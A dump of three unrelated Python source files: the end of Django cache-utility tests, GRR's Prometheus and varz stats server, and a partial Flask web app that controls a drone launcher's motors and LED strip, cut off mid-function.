self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
@override_settings(USE_ETAGS=False)
def test_without_etag(self):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertFalse(response.has_header('ETag'))
@override_settings(USE_ETAGS=True)
def test_with_etag(self):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertTrue(response.has_header('ETag'))
class TestMakeTemplateFragmentKey(SimpleTestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key,
'template.cache.foo.900150983cd24fb0d6963f7d28e17f72')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key,
'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key,
'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469')
class CacheHandlerTest(SimpleTestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertIs(cache1, cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertIsNot(c[0], c[1])
|
stats_server.py
|
#!/usr/bin/env python
"""Stats server implementation."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import collections
import errno
import json
import logging
import socket
import threading
from future.builtins import range
from future.moves.urllib import parse as urlparse
from future.utils import iteritems
from http import server as http_server
import prometheus_client
from grr_response_core import config
from grr_response_core.lib import registry
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import stats as rdf_stats
from grr_response_core.stats import stats_collector_instance
from grr_response_server import base_stats_server
def _JSONMetricValue(metric_info, value):
if metric_info.metric_type == rdf_stats.MetricMetadata.MetricType.EVENT:
return dict(
sum=value.sum,
counter=value.count,
bins_heights=collections.OrderedDict(value.bins_heights))
else:
return value
def BuildVarzJsonString():
"""Builds Varz JSON string from all stats metrics."""
results = {}
for name, metric_info in iteritems(
stats_collector_instance.Get().GetAllMetricsMetadata()):
info_dict = dict(metric_type=metric_info.metric_type.name)
if metric_info.value_type:
info_dict["value_type"] = metric_info.value_type.name
if metric_info.docstring:
info_dict["docstring"] = metric_info.docstring
if metric_info.units:
info_dict["units"] = metric_info.units.name
if metric_info.fields_defs:
info_dict["fields_defs"] = []
for field_def in metric_info.fields_defs:
info_dict["fields_defs"].append((field_def.field_name,
utils.SmartStr(field_def.field_type)))
value = {}
all_fields = stats_collector_instance.Get().GetMetricFields(name)
for f in all_fields:
joined_fields = ":".join(utils.SmartStr(fname) for fname in f)
value[joined_fields] = _JSONMetricValue(
metric_info,
stats_collector_instance.Get().GetMetricValue(name, fields=f))
else:
value = _JSONMetricValue(
metric_info,
stats_collector_instance.Get().GetMetricValue(name))
results[name] = dict(info=info_dict, value=value)
encoder = json.JSONEncoder()
return encoder.encode(results)
class StatsServerHandler(http_server.BaseHTTPRequestHandler):
"""Default stats server implementation."""
def do_GET(self): # pylint: disable=g-bad-name
if self.path == "/prometheus_metrics":
# TODO: This code is copied from
# prometheus_client.MetricsHandler. Because MetricsHandler is an old-style
# class and dispatching to different BaseHTTPRequestHandlers is
# surprisingly hard, we copied the code instead of calling it. After a
# deprecation period, the /varz route will be removed and
# StatsServerHandler can be replaced by prometheus_client.MetricsHandler.
pc_registry = prometheus_client.REGISTRY
params = urlparse.parse_qs(urlparse.urlparse(self.path).query)
encoder, content_type = prometheus_client.exposition.choose_encoder(
self.headers.get("Accept"))
if "name[]" in params:
pc_registry = pc_registry.restricted_registry(params["name[]"])
try:
output = encoder(pc_registry)
except:
self.send_error(500, "error generating metric output")
raise
self.send_response(200)
self.send_header("Content-Type", content_type)
self.end_headers()
self.wfile.write(output)
elif self.path == "/varz":
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(BuildVarzJsonString())
elif self.path == "/healthz":
self.send_response(200)
else:
self.send_error(404, "Not found")
class StatsServer(base_stats_server.BaseStatsServer):
"""A statistics server that exposes a minimal, custom /varz route."""
def __init__(self, port):
"""Instantiates a new StatsServer.
Args:
port: The TCP port that the server should listen to.
"""
super(StatsServer, self).__init__(port)
self._http_server = None
self._server_thread = None
def Start(self):
"""Start HTTPServer."""
try:
self._http_server = http_server.HTTPServer(("", self.port),
StatsServerHandler)
except socket.error as e:
if e.errno == errno.EADDRINUSE:
raise base_stats_server.PortInUseError(self.port)
else:
raise
self._server_thread = threading.Thread(
target=self._http_server.serve_forever)
self._server_thread.daemon = True
self._server_thread.start()
def Stop(self):
"""Stops serving statistics."""
self._http_server.shutdown()
self._server_thread.join()
class StatsServerInit(registry.InitHook):
"""Starts up a varz server after everything is registered."""
def RunOnce(self):
"""Main method of this registry hook.
StatsServer implementation may be overriden. If there's a "stats_server"
module present in grr/local directory then
grr.local.stats_server.StatsServer implementation will be used instead of
a default one.
"""
# Figure out which port to use.
port = config.CONFIG["Monitoring.http_port"]
if not port:
logging.info("Monitoring server disabled.")
return
# TODO(user): Implement __contains__ for GrrConfigManager.
max_port = config.CONFIG.Get("Monitoring.http_port_max", None)
if max_port is None:
# Use the same number of available ports as the adminui is using. If we
# have 10 available for adminui we will need 10 for the stats server.
adminui_max_port = config.CONFIG.Get("AdminUI.port_max",
config.CONFIG["AdminUI.port"])
max_port = port + adminui_max_port - config.CONFIG["AdminUI.port"]
try:
# pylint: disable=g-import-not-at-top
from grr_response_server.local import stats_server
# pylint: enable=g-import-not-at-top
server_cls = stats_server.StatsServer
logging.debug("Using local StatsServer")
except ImportError:
logging.debug("Using default StatsServer")
server_cls = StatsServer
for port in range(port, max_port + 1):
try:
logging.info("Starting monitoring server on port %d.", port)
server_obj = server_cls(port)
server_obj.Start()
return
except base_stats_server.PortInUseError as e:
if e.port < max_port:
logging.info(e.message)
continue
raise
|
dronelauncher_python1.py
|
#DRONE LAUNCHER
#Import modules
from flask import Flask, render_template, request, jsonify
from roboclaw import Roboclaw
import time
import socket
from neopixel import *
import argparse
import threading
import thermo
# LED strip configuration:
LED_COUNT = 60 # Number of LED pixels.
LED_PIN = 18 # GPIO pin connected to the pixels (18 uses PWM!).
#LED_PIN = 10 # GPIO pin connected to the pixels (10 uses SPI /dev/spidev0.0).
LED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)
LED_DMA = 10 # DMA channel to use for generating signal (try 10)
LED_BRIGHTNESS = 255 # Set to 0 for darkest and 255 for brightest
LED_INVERT = False # True to invert the signal (when using NPN transistor level shift)
LED_CHANNEL = 0 # set to '1' for GPIOs 13, 19, 41, 45 or 53
# Create NeoPixel object with appropriate configuration.
strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL)
# Define functions which animate LEDs in various ways.
def colorWipe(strip, color, wait_ms=50):
"""Wipe color across display a pixel at a time."""
for i in range(strip.numPixels()):
strip.setPixelColor(i, color)
strip.show()
time.sleep(wait_ms/1000.0)
def theaterChase(strip, color, wait_ms=50, iterations=10):
"""Movie theater light style chaser animation."""
for j in range(iterations):
for q in range(3):
for i in range(0, strip.numPixels(), 3):
strip.setPixelColor(i+q, color)
strip.show()
time.sleep(wait_ms/1000.0)
for i in range(0, strip.numPixels(), 3):
strip.setPixelColor(i+q, 0)
def wheel(pos):
"""Generate rainbow colors across 0-255 positions."""
if pos < 85:
return Color(pos * 3, 255 - pos * 3, 0)
elif pos < 170:
pos -= 85
return Color(255 - pos * 3, 0, pos * 3)
else:
pos -= 170
return Color(0, pos * 3, 255 - pos * 3)
def rainbow(strip, wait_ms=20, iterations=1):
"""Draw rainbow that fades across all pixels at once."""
for j in range(256*iterations):
for i in range(strip.numPixels()):
strip.setPixelColor(i, wheel((i+j) & 255))
strip.show()
time.sleep(wait_ms/1000.0)
def rainbowCycle(strip, wait_ms=20, iterations=5):
"""Draw rainbow that uniformly distributes itself across all pixels."""
for j in range(256*iterations):
for i in range(strip.numPixels()):
strip.setPixelColor(i, wheel((int(i * 256 / strip.numPixels()) + j) & 255))
strip.show()
time.sleep(wait_ms/1000.0)
def theaterChaseRainbow(strip, wait_ms=50):
"""Rainbow movie theater light style chaser animation."""
for j in range(256):
for q in range(3):
for i in range(0, strip.numPixels(), 3):
strip.setPixelColor(i+q, wheel((i+j) % 255))
strip.show()
time.sleep(wait_ms/1000.0)
for i in range(0, strip.numPixels(), 3):
strip.setPixelColor(i+q, 0)
#Open serial port
#Linux comport name
#rc = Roboclaw("/dev/ttyACM0",115200)
#Windows comport name
rc = Roboclaw("COM8",115200)
rc.Open()
#Declare variables
#Specify IP address and port for the server
host=(([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2] if not ip.startswith("127.")] or [[(s.connect(("8.8.8.8", 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]]) + ["no IP found"])[0]
port=5001
address = 0x80 #Controller 1, M1=Pitch, M2=Rotation
address_2 = 0x81 #Controller 2, M1=Lift, M2=Launch
pitch_pulses=355000 #Encoder pulses from the linear actuator
pitch_length=90.0 #Degrees
pitch_speed_pulses=7000 #Pulses per second
pitch_speed_manual=127 #From 0 to 127
pitch_ready=70.0 #Pitch degrees for the launch (temporary)
rotation_pulses=950000 #Encoder pulses from the rotation motor
rotation_length=180.0 #Degrees
rotation_speed_pulses=16000 #Pulses per second
rotation_speed_manual=15 #From 0 to 127
rotation_ready=10.0 #Rotation degress for the launch (temporary)
lift_pulses=19000 #Encoder pulses from the lifting colum
lift_length=130.0 #cm
lift_speed_pulses=420 #Pulses per second
lift_speed_manual=127 #From 0 to 127
lift_ready=lift_length #Lift lenght for the launch (temporary)
launch_pulses=14800 #Encoder pulses from the launch motor
launch_length=111.0 #cm
launch_speed_pulses=6*13400 #Pulses per second during launch (145000 max) (13400 pulses/m)
launch_speed_pulses_slow=2500 #Pulses per second during preparation
launch_speed_manual=12 #From 0 to 127
launch_acceleration=(launch_speed_pulses**2)/13400 #Acceleration during launch (pulses/second2)
launch_max_speed=10 #Maximum launch speed
launch_min_speed=1 #Minimum launch speed
launch_max_acceleration=48 #Maximum launch acceleration
launch_min_acceleration=1 #Minimum launch acceleration
launch_standby=8000 #Drone position during stand-by
launch_mount=17000 #Drone position during mounting
launch_break=21000 #Belt position during breaking
launch_bottom=0 #Drone position at the back part of the capsule
launch_connect=2190 #Belt position for touching the upper part
encoders_ready = 0 #At the beggining, the encoders are not ready
#Create an instance of the Flask class for the web app
app = Flask(__name__)
app.debug = True
#Render HTML template
@app.route("/")
def index():
return render_template('dronelauncher_web.html')
#Motor controller functions
#rc.ForwardM2(address, rotation_speed_manual)
#rc.ForwardM2(address,0) #Both commands are used to avoid rotation
@app.route('/app_pitch_up', methods=['POST'])
def function_pitch_up():
rc.BackwardM1(address, pitch_speed_manual)
return (''), 204 #Returns an empty response
@app.route('/app_pitch_down', methods=['POST'])
def function_pitch_down():
rc.ForwardM1(address, pitch_speed_manual)
return (''), 204
@app.route('/app_pitch_position', methods=['POST'])
def function_pitch_position():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
pitch_position = request.form.get('pitch_position', type=int)
if pitch_position > pitch_length or pitch_position < 0:
return (''), 400
elif pitch_position == 0:
pitch_objective = 0
else:
pitch_objective = int(pitch_pulses/(pitch_length/pitch_position))
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
return (''), 204
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
return (''), 204
@app.route('/app_pitch_stop', methods=['POST'])
def function_pitch_stop():
rc.ForwardM1(address,0)
return (''), 204
@app.route('/app_rotation_right', methods=['POST'])
def function_rotation_right():
rc.ForwardM2(address, rotation_speed_manual)
return (''), 204
@app.route('/app_rotation_left', methods=['POST'])
def function_rotation_left():
rc.BackwardM2(address, rotation_speed_manual)
return (''), 204
@app.route('/app_rotation_position', methods=['POST'])
def function_rotation_position():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
rotation_position = request.form.get('rotation_position', type=int)
if rotation_position > rotation_length or rotation_position < -rotation_length:
return (''), 400
elif rotation_position == 0:
rotation_objective = 0
else:
rotation_objective = int((rotation_pulses/(rotation_length/rotation_position))/2)
rotation_actual = rc.ReadEncM2(address)[1]
rotation_increment = rotation_objective-rotation_actual
if rotation_increment >= 0:
rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
return (''), 204
else:
rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
return (''), 204
@app.route('/app_rotation_stop', methods=['POST'])
def function_rotation_stop():
rc.ForwardM2(address,0)
return (''), 204
@app.route('/app_lift_up', methods=['POST'])
def function_lift_up():
rc.ForwardM1(address_2, lift_speed_manual)
return (''), 204
@app.route('/app_lift_down', methods=['POST'])
def function_lift_down():
rc.BackwardM1(address_2, lift_speed_manual)
return (''), 204
@app.route('/app_lift_position', methods=['POST'])
def function_lift_position():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
lift_position = request.form.get('lift_position', type=int)
if lift_position > lift_length or lift_position < 0:
return (''), 400
elif lift_position == 0:
lift_objective = 0
else:
lift_objective = int(lift_pulses/(lift_length/lift_position))
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
return (''), 204
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
return (''), 204
@app.route('/app_lift_stop', methods=['POST'])
def function_lift_stop():
rc.ForwardM1(address_2,0)
return (''), 204
@app.route('/app_launch_forwards', methods=['POST'])
def function_launch_forwards():
rc.ForwardM2(address_2, launch_speed_manual)
#rc.SpeedM2(address_2,launch_speed_pulses_slow) #Using the speed control instead of the duty cycle because the friction changes in the tube
return (''), 204
@app.route('/app_launch_backwards', methods=['POST'])
def function_launch_backwards():
rc.BackwardM2(address_2, launch_speed_manual)
#rc.SpeedM2(address_2,-launch_speed_pulses_slow) #Using the speed control instead of the duty cycle because the friction changes in the tube
return (''), 204
@app.route('/app_launch_position', methods=['POST'])
def function_launch_position():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
launch_position = request.form.get('launch_position', type=int)
if launch_position > launch_length or launch_position < 0:
return (''), 400
else:
launch_objective = launch_bottom
launch_actual = rc.ReadEncM2(address_2)[1]
launch_increment = launch_objective-launch_actual
if launch_increment >= 0:
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
buffer_2 = (0,0,0)
while(buffer_2[2]!=0x80): #Loop until all movements are completed
buffer_2 = rc.ReadBuffers(address_2)
if launch_position == 0:
launch_objective = 0
else:
launch_objective = int(launch_pulses/(launch_length/launch_position))
launch_actual = rc.ReadEncM2(address_2)[1]
launch_increment = launch_objective-launch_actual+launch_connect
if launch_increment >= 0:
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
return (''), 204
else:
rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,0)
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
return (''), 204
@app.route('/app_launch_stop', methods=['POST'])
def function_launch_stop():
rc.ForwardM2(address_2,0)
return (''), 204
@app.route('/app_max_pitch', methods=['POST'])
def function_max_pitch():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
pitch_objective = pitch_pulses
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
return (''), 204
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
return (''), 204
@app.route('/app_min_pitch', methods=['POST'])
def function_min_pitch():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
pitch_objective = 0
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
return (''), 204
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
return (''), 204
@app.route('/app_max_lift', methods=['POST'])
def function_max_lift():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
lift_objective = lift_pulses
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
return (''), 204
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
return (''), 204
@app.route('/app_min_lift', methods=['POST'])
def function_min_lift():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
lift_objective = 0
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
return (''), 204
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
return (''), 204
@app.route('/app_home', methods=['POST'])
def function_home():
rc.BackwardM1(address, pitch_speed_manual)
rc.BackwardM1(address_2, lift_speed_manual)
rc.BackwardM2(address_2, launch_speed_manual)
#rc.SpeedM2(address_2,-launch_speed_pulses_slow) #Using the speed control instead of the duty cycle because the friction changes in the tube
#Missing rotation limit switch
return (''), 204
@app.route('/app_reset_encoders', methods=['POST'])
def function_reset_encoders():
#rc.ResetEncoders(address)
#rc.ResetEncoders(address_2)
global encoders_ready
encoders_ready = 1 #Encoders have been reset
return (''), 204
@app.route('/app_battery_voltage', methods=['POST'])
def function_battery_voltage():
voltage = round(0.1*rc.ReadMainBatteryVoltage(address)[1],2)
return jsonify(voltage=voltage)
@app.route('/app_stop', methods=['POST'])
def function_stop():
rc.ForwardM1(address,0)
rc.ForwardM2(address,0)
rc.ForwardM1(address_2,0)
rc.ForwardM2(address_2,0)
return (''), 204
@app.route('/app_standby', methods=['POST'])
def function_standby():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
print ('STANDBY MODE')
colorWipe(strip, Color(255, 255, 255))
pitch_objective = 0
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
rotation_objective = 0
rotation_actual = rc.ReadEncM2(address)[1]
rotation_increment = rotation_objective-rotation_actual
if rotation_increment >= 0:
rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
lift_objective = 0
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
launch_objective = launch_bottom
launch_actual = rc.ReadEncM2(address_2)[1]
launch_increment = launch_objective-launch_actual
if launch_increment >= 0:
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_standby,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
return (''), 204
@app.route('/app_prepare', methods=['POST'])
def function_prepare():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
if pitch_ready == 0:
pitch_objective = 0
else:
pitch_objective = int(pitch_pulses/(pitch_length/pitch_ready))
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
if rotation_ready == 0:
rotation_objective = 0
else:
rotation_objective = int(rotation_pulses/(rotation_length/rotation_ready))
rotation_actual = rc.ReadEncM2(address)[1]
rotation_increment = rotation_objective-rotation_actual
if rotation_increment >= 0:
rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
if lift_ready == 0:
lift_objective = 0
else:
lift_objective = int(lift_pulses/(lift_length/lift_ready))
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
launch_objective = launch_bottom
launch_actual = rc.ReadEncM2(address_2)[1]
launch_increment = launch_objective-launch_actual
if launch_increment >= 0:
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
return (''), 204
@app.route('/app_launch', methods=['POST'])
def function_launch():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
print ('READY TO LAUNCH MODE')
colorWipe(strip, Color(255, 0, 0))
launch_objective = launch_bottom
launch_actual = rc.ReadEncM2(address_2)[1]
launch_increment = launch_objective-launch_actual
if launch_increment >= 0:
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_connect,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
launch_objective = launch_break
launch_actual = launch_connect
launch_increment = launch_objective-launch_actual
rc.SpeedAccelDistanceM2(address_2,launch_acceleration,launch_speed_pulses,launch_increment,0)
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
return (''), 204
@app.route('/app_mount', methods=['POST'])
def function_mount():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
pitch_objective = pitch_pulses
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
rotation_objective = 0
rotation_actual = rc.ReadEncM2(address)[1]
rotation_increment = rotation_objective-rotation_actual
if rotation_increment >= 0:
rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
